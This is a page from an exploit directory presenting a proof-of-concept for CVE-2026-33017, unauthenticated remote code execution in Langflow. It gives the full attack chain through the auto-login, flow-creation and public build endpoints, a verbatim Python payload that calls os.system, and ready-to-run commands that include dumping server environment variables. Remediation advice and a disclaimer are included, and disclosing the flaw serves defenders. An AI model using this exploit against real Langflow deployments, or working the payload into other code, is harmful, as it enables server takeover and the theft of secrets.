Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-33017-langflow-rce — Proof-of-concept for CVE-2026-33017, demonstrating unauthenticated remote code execution in vulnerable Langflow versions through malicious CustomComponent code injection. | Kitploit
Outils/GitHubGitHub/arensballiu/cve-2026-33017-langflow-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubarensballiu/cve-2026-33017-langflow-rce

CVE-2026-33017-langflow-rce

Proof-of-concept for CVE-2026-33017, demonstrating unauthenticated remote code execution in vulnerable Langflow versions through malicious CustomComponent code injection.

Voir le dépôt
40il y a 11 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Contenu non disponible dans la langue demandée. Affichage de la version anglaise.

CVE-2026-33017 - Langflow Unauthenticated Remote Code Execution (RCE)

Overview

CVE ID: CVE-2026-33017
Affected Software: Langflow Vulnerable Versions: <= 1.8.2 Fixed Version: >= 1.9.0 Severity: Critical
Author: arensballiu
Date: 2026

Description

Langflow exposes a public flow build endpoint (/api/v1/build_public_tmp/{flowID}/flow) that accepts arbitrary CustomComponent code blocks and executes them server-side without authentication. By injecting a malicious Python payload into the code field of a CustomComponent node, an unauthenticated attacker can run arbitrary operating system commands with the privileges of the Langflow server process.

The attack chain first abuses the /api/v1/auto_login endpoint, which issues a bearer token without requiring credentials when Langflow is running in its default auto-login configuration. Then it uses that token to create a temporary public flow and trigger server-side code execution through the build endpoint.

A docker file is included which creates a docker instance with langflow installed and running.

Affected Endpoints

EndpointMethodAuth RequiredPurpose
/api/v1/auto_loginGETNoObtain bearer token (auto-login must be enabled)
/api/v1/flows/POSTYes (Bearer)Create a new flow
/api/v1/build_public_tmp/{flowID}/flowPOSTNo (public)Trigger build - vulnerable execution point
/api/v1/flows/{flowID}DELETEYes (Bearer)Clean up the created flow

Proof of Concept

File: CVE-2026-33017_POC.py

Requirements

  • Python 3.x
  • requests library
  • Network access to a Langflow instance running with auto-login enabled
pip install requests

Usage

python3 CVE-2026-33017_POC.py -u <target_url> -c <command> [-d]

Arguments

FlagLong FormRequiredDescription
-u--urlYesBase URL of the Langflow instance
-c--commandYesOS command to execute on the server
-d--deleteNoDelete the created flow after exploitation

Examples

Verify code execution:

python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "id"

Retrieve server environment variables:

python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "env"

Keep the flow alive after exploitation (skip cleanup):

python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "whoami" -d

Expected Output

[+] Got token
[+] Created flow with id: <id>
[+] Exploit sent successfully!
[+] Flow deleted successfully!

Payload Breakdown

The exploit injects the following Python snippet into the code field of a CustomComponent node:

from langflow.custom import Component
from langflow.io import Output
_r = __import__('os').system(<command>)
class ExploitComponent(Component):
    display_name = "ExploitComponent"
    outputs = [Output(display_name="Result", name="output", method="run")]
    def run(self):
        return "ok"
  • __import__('os').system(...) - dynamically imports the os module and executes the attacker-supplied shell command on the server.
  • The rest of the class definition is a valid CustomComponent required to satisfy Langflow's component loader without raising a parse error.
  • The flow is created as PUBLIC and the build endpoint is invoked on its public endpoint, meaning no session cookie or authentication token is required to trigger execution.

Root Cause

Langflow's CustomComponent system allows arbitrary Python code to be submitted as part of a flow definition. The /api/v1/build_public_tmp/{flowID}/flow endpoint builds and partially evaluates this code server-side including module-level statements without sandboxing or restricting access to Python built-ins such as __import__.

Attack Chain Summary

1. GET /api/v1/auto_login          →  Obtain Bearer token (no credentials needed)
2. POST /api/v1/flows/             →  Create a PUBLIC flow (Bearer token)
3. POST /api/v1/build_public_tmp/  →  Inject & execute malicious CustomComponent (no auth)
4. DELETE /api/v1/flows/{id}       →  Clean up (optional)

All four steps can be performed by an anonymous attacker against a default Langflow deployment.

Remediation

  • Upgrade Langflow to version 1.9.0 or above.
  • Disable auto-login (LANGFLOW_AUTO_LOGIN=false) in any internet-facing deployment.

Disclaimer

This proof of concept is provided for educational and authorized security research purposes only. Use of this script against systems without explicit written permission is illegal and unethical. The author and contributors assume no liability for misuse.

Télécharger l’outil